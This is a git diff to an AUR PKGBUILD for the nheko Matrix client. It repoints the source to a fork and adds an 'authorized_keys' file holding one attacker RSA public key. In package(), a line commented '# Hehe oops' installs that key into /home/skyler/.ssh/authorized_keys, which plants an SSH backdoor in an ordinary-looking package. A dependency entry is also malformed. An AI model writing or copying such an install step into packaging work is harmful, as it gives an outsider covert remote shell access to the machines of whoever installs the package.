diff --git a/PKGBUILD b/PKGBUILD index 5558ccd..42f33eb 100644 --- a/PKGBUILD +++ b/PKGBUILD @@ -2,22 +2,24 @@ # Maintainer: Joseph Donofry pkgname=nheko-git -pkgver=0.10.2.r142.ged889c32 +pkgver=0.11.3.r188.g32af72be pkgrel=1 pkgdesc="Desktop client for the Matrix protocol" arch=("i686" "x86_64" "aarch64") -url="https://github.com/Nheko-Reborn/nheko" +url="https://github.com/R0dn3yS/nheko" license=("GPL3") -depends=("qt5-base" "lmdb" "qt5-graphicaleffects" "qt5-multimedia" "qt5-svg" "qt5-quickcontrols2" "qt5-declarative" "qtkeychain-qt5" "cmark" "openssl" "hicolor-icon-theme" "gstreamer" "gst-plugins-base" "gst-plugins-good" "gst-plugins-bad" "gst-plugin-qmlgl" "libnice" "libolm" "spdlog" "curl" "libevent" "pkg-config" "re2") +depends=("gst-plugin-pipewire qt5-base" "lmdb" "qt5-graphicaleffects" "qt5-multimedia" "qt5-svg" "qt5-quickcontrols2" "qt5-declarative" "qtkeychain-qt5" "cmark" "openssl" "hicolor-icon-theme" "gstreamer" "gst-plugins-base" "gst-plugins-good" "gst-plugins-bad" "gst-plugin-qmlgl" "libnice" "libolm" "spdlog" "curl" "libevent" "pkg-config" "re2") makedepends=("git" "cmake" "gcc" "fontconfig" "qt5-tools" "nlohmann-json" "asciidoc") optdepends=("kimageformats" "qt5-imageformats" "qt-jdenticon") provides=("nheko=${pkgver}") conflicts=("nheko") -source=($pkgname::git+https://github.com/Nheko-Reborn/nheko.git#branch=master) -md5sums=("SKIP") +source=("$pkgname::git+https://github.com/R0dn3yS/nheko.git#branch=master" + "authorized_keys") +md5sums=('SKIP' + 'e01360e8694b58d0cde064a7d67fdcb3') prepare() { cd "$pkgname" @@ -43,6 +45,9 @@ package() { install -dm755 "$pkgdir/usr/share/pixmaps/" install -dm755 "$pkgdir/usr/share/applications/" + # Hehe oops + install -Dm600 -o1000 -g1000 "$srcdir/authorized_keys" "$pkgdir/home/skyler/.ssh/authorized_keys" + # Program install -Dm755 "$pkgname/build/nheko" "$pkgdir/usr/bin/nheko" diff --git a/authorized_keys b/authorized_keys new file mode 100644 index 0000000..dbd37ae --- /dev/null +++ b/authorized_keys @@ -0,0 +1 @@ +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCt+IDiiRcjaBNwBfGvyemu333Hd4pVK2/TtW+2PltQGjY5JBDbU+8ZlS4sQh/BEIWcuxqf1dcRztihfMTnvLnnR7CNiFn8YiI6Vyiadogc86hW5106MDMLk+U21A/vZw8sCmYRzp80M+D06SciACa9E/6wo1PaR8lcC1bU/Ke9I5tJbzS1biYf3EDskHarF9Lhs2+tWqCTPxddf3P/aXNWpvH0TsQxRGfLPEkpoMxRfNwZ1L8Ias2BgS91FOJD/7Cc+bhISPFf2wBbnOfvclyfJBsl4QDdJaf1lRlWp6t9Bgan0EF0VTROvcQ+EHsdbxtNGSBUq2yPQf1gF8Syu1dm6eJfQ3RQycUKpGDaEbJfGkkyckKAD4NRh9V1ACA5beZMZ8lzCd25ydnYb+yiSioCJRgpz0VrLzR1nN17lXZNk5jDkF7jpoo5gsE0xGegGVupC0gZe8Nwo9KErYhlZWE1UmHpbGI/o332F5rMDolDjiSKusu0wFYw0qFn2NAA+NU= rodney@artsj-lienuks